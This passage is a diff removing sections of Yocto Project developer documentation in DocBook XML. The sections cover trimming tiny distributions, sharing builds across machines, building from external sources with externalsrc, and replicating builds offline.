-        <section id='building-a-tiny-system'>
-            <title>Building a Tiny System</title>
-
-            <para>
-                Very small distributions have some significant advantages such
-                as requiring less on-die or in-package memory (cheaper), better
-                performance through efficient cache usage, lower power requirements
-                due to less memory, faster boot times, and reduced development
-                overhead.
-                Some real-world examples where a very small distribution gives
-                you distinct advantages are digital cameras, medical devices,
-                and small headless systems.
-            </para>
-
-            <para>
-                This section presents information that shows you how you can
-                trim your distribution to even smaller sizes than the
-                <filename>poky-tiny</filename> distribution, which is around
-                5 Mbytes, that can be built out-of-the-box using the Yocto Project.
-            </para>
-
-            <section id='tiny-system-overview'>
-                <title>Overview</title>
-
-                <para>
-                    The following list presents the overall steps you need to
-                    consider and perform to create distributions with smaller
-                    root filesystems, achieve faster boot times, maintain your critical
-                    functionality, and avoid initial RAM disks:
-                    <itemizedlist>
-                        <listitem><para>
-                            <link linkend='goals-and-guiding-principles'>Determine your goals and guiding principles.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='understand-what-gives-your-image-size'>Understand what contributes to your image size.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='trim-the-root-filesystem'>Reduce the size of the root filesystem.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='trim-the-kernel'>Reduce the size of the kernel.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='remove-package-management-requirements'>Eliminate packaging requirements.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='look-for-other-ways-to-minimize-size'>Look for other ways to minimize size.</link>
-                            </para></listitem>
-                        <listitem><para>
-                            <link linkend='iterate-on-the-process'>Iterate on the process.</link>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='goals-and-guiding-principles'>
-                <title>Goals and Guiding Principles</title>
-
-                <para>
-                    Before you can reach your destination, you need to know
-                    where you are going.
-                    Here is an example list that you can use as a guide when
-                    creating very small distributions:
-                    <itemizedlist>
-                        <listitem><para>Determine how much space you need
-                            (e.g. a kernel that is 1 Mbyte or less and
-                            a root filesystem that is 3 Mbytes or less).
-                            </para></listitem>
-                        <listitem><para>Find the areas that are currently
-                            taking 90% of the space and concentrate on reducing
-                            those areas.
-                            </para></listitem>
-                        <listitem><para>Do not create any difficult "hacks"
-                            to achieve your goals.</para></listitem>
-                        <listitem><para>Leverage the device-specific
-                            options.</para></listitem>
-                        <listitem><para>Work in a separate layer so that you
-                            keep changes isolated.
-                            For information on how to create layers, see
-                            the "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>" section.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='understand-what-gives-your-image-size'>
-                <title>Understand What Contributes to Your Image Size</title>
-
-                <para>
-                    It is easiest to have something to start with when creating
-                    your own distribution.
-                    You can use the Yocto Project out-of-the-box to create the
-                    <filename>poky-tiny</filename> distribution.
-                    Ultimately, you will want to make changes in your own
-                    distribution that are likely modeled after
-                    <filename>poky-tiny</filename>.
-                    <note>
-                        To use <filename>poky-tiny</filename> in your build,
-                        set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-                        variable in your
-                        <filename>local.conf</filename> file to "poky-tiny"
-                        as described in the
-                        "<link linkend='creating-your-own-distribution'>Creating Your Own Distribution</link>"
-                        section.
-                    </note>
-                </para>
-
-                <para>
-                    Understanding some memory concepts will help you reduce the
-                    system size.
-                    Memory consists of static, dynamic, and temporary memory.
-                    Static memory is the TEXT (code), DATA (initialized data
-                    in the code), and BSS (uninitialized data) sections.
-                    Dynamic memory represents memory that is allocated at runtime:
-                    stacks, hash tables, and so forth.
-                    Temporary memory is recovered after the boot process.
-                    This memory consists of memory used for decompressing
-                    the kernel and for the <filename>__init__</filename>
-                    functions.
-                </para>
-
-                <para>
-                    To help you see where you currently are with kernel and root
-                    filesystem sizes, you can use two tools found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink> in
-                    the <filename>scripts/tiny/</filename> directory:
-                    <itemizedlist>
-                        <listitem><para><filename>ksize.py</filename>: Reports
-                            component sizes for the kernel build objects.
-                            </para></listitem>
-                        <listitem><para><filename>dirsize.py</filename>: Reports
-                            component sizes for the root filesystem.</para></listitem>
-                    </itemizedlist>
-                    This next tool and command help you organize configuration
-                    fragments and view file dependencies in a human-readable form:
-                    <itemizedlist>
-                        <listitem><para><filename>merge_config.sh</filename>:
-                            Helps you manage configuration files and fragments
-                            within the kernel.
-                            With this tool, you can merge individual configuration
-                            fragments together.
-                            The tool allows you to make overrides and warns you
-                            of any missing configuration options.
-                            The tool is ideal for allowing you to iterate on
-                            configurations, create minimal configurations, and
-                            create configuration files for different machines
-                            without having to duplicate your process.</para>
-                            <para>The <filename>merge_config.sh</filename> script is
-                            part of the Linux Yocto kernel Git repositories
-                            (i.e. <filename>linux-yocto-3.14</filename>,
-                            <filename>linux-yocto-3.10</filename>,
-                            <filename>linux-yocto-3.8</filename>, and so forth)
-                            in the
-                            <filename>scripts/kconfig</filename> directory.</para>
-                            <para>For more information on configuration fragments,
-                            see the
-                            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-config-fragments'>Creating Configuration Fragments</ulink>"
-                            section in the Yocto Project Linux Kernel Development
-                            Manual.
-                            </para></listitem>
-                        <listitem><para><filename>bitbake -u taskexp -g <replaceable>bitbake_target</replaceable></filename>:
-                            Using the BitBake command with these options brings up
-                            a Dependency Explorer from which you can view file
-                            dependencies.
-                            Understanding these dependencies allows you to make
-                            informed decisions when cutting out various pieces of the
-                            kernel and root filesystem.</para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='trim-the-root-filesystem'>
-                <title>Trim the Root Filesystem</title>
-
-                <para>
-                    The root filesystem is made up of packages for booting,
-                    libraries, and applications.
-                    To change things, you can configure how the packaging happens,
-                    which changes the way you build them.
-                    You can also modify the filesystem itself or select a different
-                    filesystem.
-                </para>
-
-                <para>
-                    First, find out what is hogging your root filesystem by running the
-                    <filename>dirsize.py</filename> script from your root directory:
-                    <literallayout class='monospaced'>
-     $ cd <replaceable>root-directory-of-image</replaceable>
-     $ dirsize.py 100000 > dirsize-100k.log
-     $ cat dirsize-100k.log
-                    </literallayout>
-                    You can apply a filter to the script to ignore files under
-                    a certain size.
-                    The previous example filters out any files below 100 Kbytes.
-                    The sizes reported by the tool are uncompressed, and thus
-                    will be smaller by a relatively constant factor in a
-                    compressed root filesystem.
-                    When you examine your log file, you can focus on areas of the
-                    root filesystem that take up large amounts of memory.
-                </para>
-
-                <para>
-                    You need to be sure that what you eliminate does not cripple
-                    the functionality you need.
-                    One way to see how packages relate to each other is by using
-                    the Dependency Explorer UI with the BitBake command:
-                    <literallayout class='monospaced'>
-     $ cd <replaceable>image-directory</replaceable>
-     $ bitbake -u taskexp -g <replaceable>image</replaceable>
-                    </literallayout>
-                    Use the interface to select potential packages you wish to
-                    eliminate and see their dependency relationships.
-                </para>
-
-                <para>
-                    When deciding how to reduce the size, get rid of packages that
-                    result in minimal impact on the feature set.
-                    For example, you might not need a VGA display.
-                    Or, you might be able to get by with <filename>devtmpfs</filename>
-                    and <filename>mdev</filename> instead of
-                    <filename>udev</filename>.
-                </para>
-
-                <para>
-                    Use your <filename>local.conf</filename> file to make changes.
-                    For example, to eliminate <filename>udev</filename> and
-                    <filename>glib</filename>, set the following in the
-                    local configuration file:
-                    <literallayout class='monospaced'>
-     VIRTUAL-RUNTIME_dev_manager = ""
-                    </literallayout>
-                </para>
-
-                <para>
-                    Finally, you should consider exactly the type of root
-                    filesystem you need to meet your needs while also reducing
-                    its size.
-                    For example, consider <filename>cramfs</filename>,
-                    <filename>squashfs</filename>, <filename>ubifs</filename>,
-                    <filename>ext2</filename>, or an <filename>initramfs</filename>
-                    using <filename>initramfs</filename>.
-                    Be aware that <filename>ext3</filename> requires a 1 Mbyte
-                    journal.
-                    If you are okay with running read-only, you do not need this
-                    journal.
-                </para>
-
-                <note>
-                    After each round of elimination, you need to rebuild your
-                    system and then use the tools to see the effects of your
-                    reductions.
-                </note>
-            </section>
-
-            <section id='trim-the-kernel'>
-                <title>Trim the Kernel</title>
-
-                <para>
-                    The kernel is built by including policies for hardware-independent
-                    aspects.
-                    What subsystems do you enable?
-                    For what architecture are you building?
-                    Which drivers do you build by default?
-                    <note>You can modify the kernel source if you want to help
-                        with boot time.
-                    </note>
-                </para>
-
-                <para>
-                    Run the <filename>ksize.py</filename> script from the top-level
-                    Linux build directory to get an idea of what is making up
-                    the kernel:
-                    <literallayout class='monospaced'>
-     $ cd <replaceable>top-level-linux-build-directory</replaceable>
-     $ ksize.py > ksize.log
-     $ cat ksize.log
-                    </literallayout>
-                    When you examine the log, you will see how much space is
-                    taken up with the built-in <filename>.o</filename> files for
-                    drivers, networking, core kernel files, filesystem, sound,
-                    and so forth.
-                    The sizes reported by the tool are uncompressed, and thus
-                    will be smaller by a relatively constant factor in a compressed
-                    kernel image.
-                    Look to reduce the areas that are large and taking up around
-                    the "90% rule."
-                </para>
-
-                <para>
-                    To examine, or drill down, into any particular area, use the
-                    <filename>-d</filename> option with the script:
-                    <literallayout class='monospaced'>
-     $ ksize.py -d > ksize.log
-                    </literallayout>
-                    Using this option breaks out the individual file information
-                    for each area of the kernel (e.g. drivers, networking, and
-                    so forth).
-                </para>
-
-                <para>
-                    Use your log file to see what you can eliminate from the kernel
-                    based on features you can let go.
-                    For example, if you are not going to need sound, you do not
-                    need any drivers that support sound.
-                </para>
-
-                <para>
-                    After figuring out what to eliminate, you need to reconfigure
-                    the kernel to reflect those changes during the next build.
-                    You could run <filename>menuconfig</filename> and make all your
-                    changes at once.
-                    However, that makes it difficult to see the effects of your
-                    individual eliminations and also makes it difficult to replicate
-                    the changes for perhaps another target device.
-                    A better method is to start with no configurations using
-                    <filename>allnoconfig</filename>, create configuration
-                    fragments for individual changes, and then manage the
-                    fragments into a single configuration file using
-                    <filename>merge_config.sh</filename>.
-                    The tool makes it easy for you to iterate using the
-                    configuration change and build cycle.
-                </para>
-
-                <para>
-                    Each time you make configuration changes, you need to rebuild
-                    the kernel and check to see what impact your changes had on
-                    the overall size.
-                </para>
-            </section>
-
-            <section id='remove-package-management-requirements'>
-                <title>Remove Package Management Requirements</title>
-
-                <para>
-                    Packaging requirements add size to the image.
-                    One way to reduce the size of the image is to remove all the
-                    packaging requirements from the image.
-                    This reduction includes both removing the package manager
-                    and its unique dependencies as well as removing the package
-                    management data itself.
-                </para>
-
-                <para>
-                    To eliminate all the packaging requirements for an image,
-                    be sure that "package-management" is not part of your
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
-                    statement for the image.
-                    When you remove this feature, you are removing the package
-                    manager as well as its dependencies from the root filesystem.
-                </para>
-            </section>
-
-            <section id='look-for-other-ways-to-minimize-size'>
-                <title>Look for Other Ways to Minimize Size</title>
-
-                <para>
-                    Depending on your particular circumstances, other areas that you
-                    can trim likely exist.
-                    The key to finding these areas is through tools and methods
-                    described here combined with experimentation and iteration.
-                    Here are a couple of areas to experiment with:
-                    <itemizedlist>
-                        <listitem><para><filename>glibc</filename>:
-                            In general, follow this process:
-                            <orderedlist>
-                                <listitem><para>Remove <filename>glibc</filename>
-                                    features from
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
-                                    that you think you do not need.</para></listitem>
-                                <listitem><para>Build your distribution.
-                                    </para></listitem>
-                                <listitem><para>If the build fails due to missing
-                                    symbols in a package, determine if you can
-                                    reconfigure the package to not need those
-                                    features.
-                                    For example, change the configuration to not
-                                    support wide character support as is done for
-                                    <filename>ncurses</filename>.
-                                    Or, if support for those characters is needed,
-                                    determine what <filename>glibc</filename>
-                                    features provide the support and restore the
-                                    configuration.
-                                    </para></listitem>
-                                <listitem><para>Rebuild and repeat the process.
-                                    </para></listitem>
-                            </orderedlist></para></listitem>
-                        <listitem><para><filename>busybox</filename>:
-                            For BusyBox, use a process similar as described for
-                            <filename>glibc</filename>.
-                            A difference is you will need to boot the resulting
-                            system to see if you are able to do everything you
-                            expect from the running system.
-                            You need to be sure to integrate configuration fragments
-                            into Busybox because BusyBox handles its own core
-                            features and then allows you to add configuration
-                            fragments on top.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='iterate-on-the-process'>
-                <title>Iterate on the Process</title>
-
-                <para>
-                    If you have not reached your goals on system size, you need
-                    to iterate on the process.
-                    The process is the same.
-                    Use the tools and see just what is taking up 90% of the root
-                    filesystem and the kernel.
-                    Decide what you can eliminate without limiting your device
-                    beyond what you need.
-                </para>
-
-                <para>
-                    Depending on your system, a good place to look might be
-                    Busybox, which provides a stripped down
-                    version of Unix tools in a single, executable file.
-                    You might be able to drop virtual terminal services or perhaps
-                    ipv6.
-                </para>
-            </section>
-        </section>
-
-        <section id='building-images-for-more-than-one-machine'>
-            <title>Building Images for More than One Machine</title>
-
-            <para>
-                A common scenario developers face is creating images for several
-                different machines that use the same software environment.
-                In this situation, it is tempting to set the
-                tunings and optimization flags for each build specifically for
-                the targeted hardware (i.e. "maxing out" the tunings).
-                Doing so can considerably add to build times and package feed
-                maintenance collectively for the machines.
-                For example, selecting tunes that are extremely specific to a
-                CPU core used in a system might enable some micro optimizations
-                in GCC for that particular system but would otherwise not gain
-                you much of a performance difference across the other systems
-                as compared to using a more general tuning across all the builds
-                (e.g. setting
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></ulink>
-                specifically for each machine's build).
-                Rather than "max out" each build's tunings, you can take steps that
-                cause the OpenEmbedded build system to reuse software across the
-                various machines where it makes sense.
-            </para>
-
-            <para>
-                If build speed and package feed maintenance are considerations,
-                you should consider the points in this section that can help you
-                optimize your tunings to best consider build times and package
-                feed maintenance.
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Share the Build Directory:</emphasis>
-                        If at all possible, share the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                        across builds.
-                        The Yocto Project supports switching between different
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        values in the same <filename>TMPDIR</filename>.
-                        This practice is well supported and regularly used by
-                        developers when building for multiple machines.
-                        When you use the same <filename>TMPDIR</filename> for
-                        multiple machine builds, the OpenEmbedded build system can
-                        reuse the existing native and often cross-recipes for
-                        multiple machines.
-                        Thus, build time decreases.
-                        <note>
-                            If
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-                            settings change or fundamental configuration settings
-                            such as the filesystem layout, you need to work with
-                            a clean <filename>TMPDIR</filename>.
-                            Sharing <filename>TMPDIR</filename> under these
-                            circumstances might work but since it is not
-                            guaranteed, you should use a clean
-                            <filename>TMPDIR</filename>.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Enable the Appropriate Package Architecture:</emphasis>
-                        By default, the OpenEmbedded build system enables three
-                        levels of package architectures: "all", "tune" or "package",
-                        and "machine".
-                        Any given recipe usually selects one of these package
-                        architectures (types) for its output.
-                        Depending for what a given recipe creates packages, making
-                        sure you enable the appropriate package architecture can
-                        directly impact the build time.</para>
-
-                        <para>A recipe that just generates scripts can enable
-                        "all" architecture because there are no binaries to build.
-                        To specifically enable "all" architecture, be sure your
-                        recipe inherits the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-allarch'><filename>allarch</filename></ulink>
-                        class.
-                        This class is useful for "all" architectures because it
-                        configures many variables so packages can be used across
-                        multiple architectures.</para>
-
-                        <para>If your recipe needs to generate packages that are
-                        machine-specific or when one of the build or runtime
-                        dependencies is already machine-architecture dependent,
-                        which makes your recipe also machine-architecture dependent,
-                        make sure your recipe enables the "machine" package
-                        architecture through the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></ulink>
-                        variable:
-                        <literallayout class='monospaced'>
-     PACKAGE_ARCH = "${MACHINE_ARCH}"
-                        </literallayout>
-                        When you do not specifically enable a package
-                        architecture through the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>,
-                        The OpenEmbedded build system defaults to the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></ulink>
-                        setting:
-                        <literallayout class='monospaced'>
-     PACKAGE_ARCH = "${TUNE_PKGARCH}"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Choose a Generic Tuning File if Possible:</emphasis>
-                        Some tunes are more generic and can run on multiple targets
-                        (e.g. an <filename>armv5</filename> set of packages could
-                        run on <filename>armv6</filename> and
-                        <filename>armv7</filename> processors in most cases).
-                        Similarly, <filename>i486</filename> binaries could work
-                        on <filename>i586</filename> and higher processors.
-                        You should realize, however, that advances on newer
-                        processor versions would not be used.</para>
-
-                        <para>If you select the same tune for several different
-                        machines, the OpenEmbedded build system reuses software
-                        previously built, thus speeding up the overall build time.
-                        Realize that even though a new sysroot for each machine is
-                        generated, the software is not recompiled and only one
-                        package feed exists.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Manage Granular Level Packaging:</emphasis>
-                        Sometimes cases exist where injecting another level of
-                        package architecture beyond the three higher levels noted
-                        earlier can be useful.
-                        For example, consider how NXP (formerly Freescale) allows
-                        for the easy reuse of binary packages in their layer
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/'><filename>meta-freescale</filename></ulink>.
-                        In this example, the
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/tree/classes/fsl-dynamic-packagearch.bbclass'><filename>fsl-dynamic-packagearch</filename></ulink>
-                        class shares GPU packages for i.MX53 boards because
-                        all boards share the AMD GPU.
-                        The i.MX6-based boards can do the same because all boards
-                        share the Vivante GPU.
-                        This class inspects the BitBake datastore to identify if
-                        the package provides or depends on one of the
-                        sub-architecture values.
-                        If so, the class sets the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>
-                        value based on the <filename>MACHINE_SUBARCH</filename>
-                        value.
-                        If the package does not provide or depend on one of the
-                        sub-architecture values but it matches a value in the
-                        machine-specific filter, it sets
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></ulink>.
-                        This behavior reduces the number of packages built and
-                        saves build time by reusing binaries.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Use Tools to Debug Issues:</emphasis>
-                        Sometimes you can run into situations where software is
-                        being rebuilt when you think it should not be.
-                        For example, the OpenEmbedded build system might not be
-                        using shared state between machines when you think it
-                        should be.
-                        These types of situations are usually due to references
-                        to machine-specific variables such as
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-XSERVER'><filename>XSERVER</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></ulink>,
-                        and so forth in code that is supposed to only be
-                        tune-specific or when the recipe depends
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-RSUGGESTS'><filename>RSUGGESTS</filename></ulink>,
-                        and so forth) on some other recipe that already has
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>
-                        defined as "${MACHINE_ARCH}".
-                        <note>
-                            Patches to fix any issues identified are most welcome
-                            as these issues occasionally do occur.
-                        </note></para>
-
-                        <para>For such cases, you can use some tools to help you
-                        sort out the situation:
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis><filename>sstate-diff-machines.sh</filename>:</emphasis>
-                                You can find this tool in the
-                                <filename>scripts</filename> directory of the
-                                Source Repositories.
-                                See the comments in the script for information on
-                                how to use the tool.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>BitBake's "-S printdiff" Option:</emphasis>
-                                Using this option causes BitBake to try to
-                                establish the closest signature match it can
-                                (e.g. in the shared state cache) and then run
-                                <filename>bitbake-diffsigs</filename> over the
-                                matches to determine the stamps and delta where
-                                these two stamp trees diverge.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id="building-software-from-an-external-source">
-            <title>Building Software from an External Source</title>
-
-            <para>
-                By default, the OpenEmbedded build system uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                when building source code.
-                The build process involves fetching the source files, unpacking
-                them, and then patching them if necessary before the build takes
-                place.
-            </para>
-
-            <para>
-                Situations exist where you might want to build software from source
-                files that are external to and thus outside of the
-                OpenEmbedded build system.
-                For example, suppose you have a project that includes a new BSP with
-                a heavily customized kernel.
-                And, you want to minimize exposing the build system to the
-                development team so that they can focus on their project and
-                maintain everyone's workflow as much as possible.
-                In this case, you want a kernel source directory on the development
-                machine where the development occurs.
-                You want the recipe's
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                variable to point to the external directory and use it as is, not
-                copy it.
-            </para>
-
-            <para>
-                To build from software that comes from an external source, all you
-                need to do is inherit the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
-                class and then set the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC'><filename>EXTERNALSRC</filename></ulink>
-                variable to point to your external source code.
-                Here are the statements to put in your
-                <filename>local.conf</filename> file:
-                <literallayout class='monospaced'>
-     INHERIT += "externalsrc"
-     EXTERNALSRC_pn-<replaceable>myrecipe</replaceable> = "<replaceable>path-to-your-source-tree</replaceable>"
-                </literallayout>
-            </para>
-
-            <para>
-                This next example shows how to accomplish the same thing by setting
-                <filename>EXTERNALSRC</filename> in the recipe itself or in the
-                recipe's append file:
-                <literallayout class='monospaced'>
-     EXTERNALSRC = "<replaceable>path</replaceable>"
-     EXTERNALSRC_BUILD = "<replaceable>path</replaceable>"
-                </literallayout>
-                <note>
-                    In order for these settings to take effect, you must globally
-                    or locally inherit the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
-                    class.
-                </note>
-            </para>
-
-            <para>
-                By default, <filename>externalsrc.bbclass</filename> builds
-                the source code in a directory separate from the external source
-                directory as specified by
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC'><filename>EXTERNALSRC</filename></ulink>.
-                If you need to have the source built in the same directory in
-                which it resides, or some other nominated directory, you can set
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC_BUILD'><filename>EXTERNALSRC_BUILD</filename></ulink>
-                to point to that directory:
-                <literallayout class='monospaced'>
-     EXTERNALSRC_BUILD_pn-<replaceable>myrecipe</replaceable> = "<replaceable>path-to-your-source-tree</replaceable>"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id="replicating-a-build-offline">
-            <title>Replicating a Build Offline</title>
-
-            <para>
-                It can be useful to take a "snapshot" of upstream sources
-                used in a build and then use that "snapshot" later to
-                replicate the build offline.
-                To do so, you need to first prepare and populate your downloads
-                directory your "snapshot" of files.
-                Once your downloads directory is ready, you can use it at
-                any time and from any machine to replicate your build.
-            </para>
-
-            <para>
-                Follow these steps to populate your Downloads directory:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Create a Clean Downloads Directory:</emphasis>
-                        Start with an empty downloads directory
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>).
-                        You start with an empty downloads directory by either
-                        removing the files in the existing directory or by
-                        setting
-                        <filename>DL_DIR</filename> to point to either an
-                        empty location or one that does not yet exist.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Generate Tarballs of the Source Git Repositories:</emphasis>
-                        Edit your <filename>local.conf</filename> configuration
-                        file as follows:
-                        <literallayout class='monospaced'>
-     DL_DIR = "/home/<replaceable>your-download-dir</replaceable>/"
-     BB_GENERATE_MIRROR_TARBALLS = "1"
-                        </literallayout>
-                        During the fetch process in the next step, BitBake
-                        gathers the source files and creates tarballs in
-                        the directory pointed to by <filename>DL_DIR</filename>.
-                        See the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
-                        variable for more information.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Populate Your Downloads Directory Without Building:</emphasis>
-                        Use BitBake to fetch your sources but inhibit the
-                        build:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>target</replaceable> --runonly=fetch
-                        </literallayout>
-                        The downloads directory (i.e.
-                        <filename>${DL_DIR}</filename>) now has a "snapshot" of
-                        the source files in the form of tarballs, which can
-                        be used for the build.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Remove Any Git or other SCM Subdirectories From the Downloads Directory:</emphasis>
-                        If you want, you can clean up your downloads directory
-                        by removing any Git or other Source Control Management
-                        (SCM) subdirectories such as
-                        <filename>${DL_DIR}/git2/*</filename>.
-                        The tarballs already contain these subdirectories.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                Once your downloads directory has everything it needs regarding
-                source files, you can create your "own-mirror" and build
-                your target.
-                Understand that you can use the files to build the target
-                offline from any machine and at any time.
-            </para>
-
-            <para>
-                Follow these steps to build your target using the files in the
-                downloads directory:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Using Local Files Only:</emphasis>
-                        Inside your <filename>local.conf</filename> file, add
-                        the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SOURCE_MIRROR_URL'><filename>SOURCE_MIRROR_URL</filename></ulink>
-                        variable,
-                        inherit the <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-own-mirrors'><filename>own-mirrors</filename></ulink>
-                        class, and use the
-                        <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></ulink>
-                        variable to your <filename>local.conf</filename>.
-                        <literallayout class='monospaced'>
-     SOURCE_MIRROR_URL ?= "file:///home/<replaceable>your-download-dir</replaceable>/"
-     INHERIT += "own-mirrors"
-     BB_NO_NETWORK = "1"
-                        </literallayout>
-                        The <filename>SOURCE_MIRROR_URL</filename> and
-                        <filename>own-mirror</filename> class set up the system
-                        to use the downloads directory as your "own mirror".
-                        Using the <filename>BB_NO_NETWORK</filename>
-                        variable makes sure that BitBake's fetching process
-                        in step 3 stays local, which means files from
-                        your "own-mirror" are used.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Start With a Clean Build:</emphasis>
-                        You can start with a clean build by removing the
-                        <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink><filename>}</filename>
-                        directory or using a new
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build Your Target:</emphasis>
-                        Use BitBake to build your target:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>target</replaceable>
-                        </literallayout>
-                        The build completes using the known local "snapshot" of
-                        source files from your mirror.
-                        The resulting tarballs for your "snapshot" of source
-                        files are in the downloads directory.
-                        <note>
-                            <para>The offline build does not work if recipes
-                            attempt to find the latest version of software
-                            by setting
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                            to
-                            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink><filename>}</filename>:
-                            <literallayout class='monospaced'>
-     SRCREV = "${AUTOREV}"
-                            </literallayout>
-                            When a recipe sets
-                            <filename>SRCREV</filename> to
-                            <filename>${AUTOREV}</filename>, the build system
-                            accesses the network in an attempt to determine the
-                            latest version of software from the SCM.
-                            Typically, recipes that use
-                            <filename>AUTOREV</filename> are custom or
-                            modified recipes.
-                            Recipes that reside in public repositories
-                            usually do not use <filename>AUTOREV</filename>.
-                            </para>
-
-                            <para>If you do have recipes that use
-                            <filename>AUTOREV</filename>, you can take steps to
-                            still use the recipes in an offline build.
-                            Do the following:
-                                <orderedlist>
-                                    <listitem><para>
-                                        Use a configuration generated by
-                                        enabling
-                                        <link linkend='maintaining-build-output-quality'>build history</link>.
-                                        </para></listitem>
-                                    <listitem><para>
-                                        Use the
-                                        <filename>buildhistory-collect-srcrevs</filename>
-                                        command to collect the stored
-                                        <filename>SRCREV</filename> values from
-                                        the build's history.
-                                        For more information on collecting these
-                                        values, see the
-                                        "<link linkend='build-history-package-information'>Build History Package Information</link>"
-                                        section.
-                                        </para></listitem>
